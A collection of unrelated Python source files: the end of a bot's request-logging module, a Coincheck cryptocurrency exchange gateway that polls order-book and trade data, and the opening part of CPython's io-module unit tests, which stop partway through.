guild_id, channel_id = get_guild_and_channel_id(context)
data = {
'word': word,
'reverse': reverse,
'text_to_speech': text_to_speech,
'language': language,
'guild_id': guild_id,
'channel_id': channel_id,
'time': datetime.datetime.now().isoformat()
}
queue.append(data)
@run_on_another_thread
def log_dictionary_api_request(dictionary_api_name: str, success: bool):
queue = qal['log_dictionary_api_request']['queue']
with qal['log_dictionary_api_request']['lock']:
data = {
'api_name': dictionary_api_name,
'success': success,
'time': datetime.datetime.now().isoformat()
}
queue.append(data)
|
coincheck.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
import threading
import time
class ExchGwApiCoincheck(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1000
@classmethod
def get_order_book_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_field_name(cls):
return 'created_at'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'order_type'
@classmethod
def get_trade_id_field_name(cls):
return 'id'
@classmethod
def get_trade_price_field_name(cls):
return 'rate'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://coincheck.com/api/order_books"
@classmethod
def get_trades_link(cls, instmt):
return "https://coincheck.com/api/trades?pair=%s" % instmt.get_instmt_code()
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# No Date time information, has update id only
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if type(bids[i][0]) != float else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if type(bids[i][1]) != float else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if type(asks[i][0]) != float else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if type(asks[i][1]) != float else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
#date_time = float(raw[cls.get_trades_timestamp_field_name()])
#date_time = date_time / cls.get_timestamp_offset()
date_time = raw[cls.get_trades_timestamp_field_name()]
trade.date_time = datetime.strptime(date_time, '%Y-%m-%dT%H:%M:%S.%fZ').strftime('%Y%m%d %H:%M:%S.%f')
# Trade side
trade.trade_side = Trade.parse_side(raw[cls.get_trade_side_field_name()])
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
# If verify cert, got <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:749)>
res = cls.request(cls.get_order_book_link(instmt), verify_cert=False)
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
# If verify cert, got <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:749)>
res = cls.request(link, verify_cert=False)
trades = []
if len(res['data']) > 0:
for t in res['data']:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwCoincheck(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiCoincheck(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Coincheck'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
time.sleep(1)
continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Coincheck'
instmt_name = 'btc_jpy'
instmt_code = 'btc_jpy'
exch = ExchGwApiCoincheck()
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwCoincheck([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
exch.start(instmt)
#exch.get_order_book_worker(instmt)
#exch.get_trades_worker(instmt)
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import import_helper
from test.support import os_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support import skip_if_sanitizer
from test.support.os_helper import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
requires_alarm = unittest.skipUnless(
hasattr(signal, "alarm"), "test requires signal.alarm()"
)
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w', encoding="utf-8")
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w', encoding="utf-8")
def test_raw_file_io(self):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(os_helper.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(os_helper.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(os_helper.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "a", encoding="utf-8") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with warnings_helper.check_warnings(('', ResourceWarning)):
f = MyFileIO(os_helper.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(os_helper.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w',
encoding="utf-8", closefd=False)
def test_read_closed(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(os_helper.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r",
encoding="utf-8", closefd=False)
def test_closefd_attr(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with warnings_helper.check_warnings(('', ResourceWarning)):
f = self.FileIO(os_helper.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(os_helper.TESTFN, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(os_helper.TESTFN, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8", closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", encoding="utf-8", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
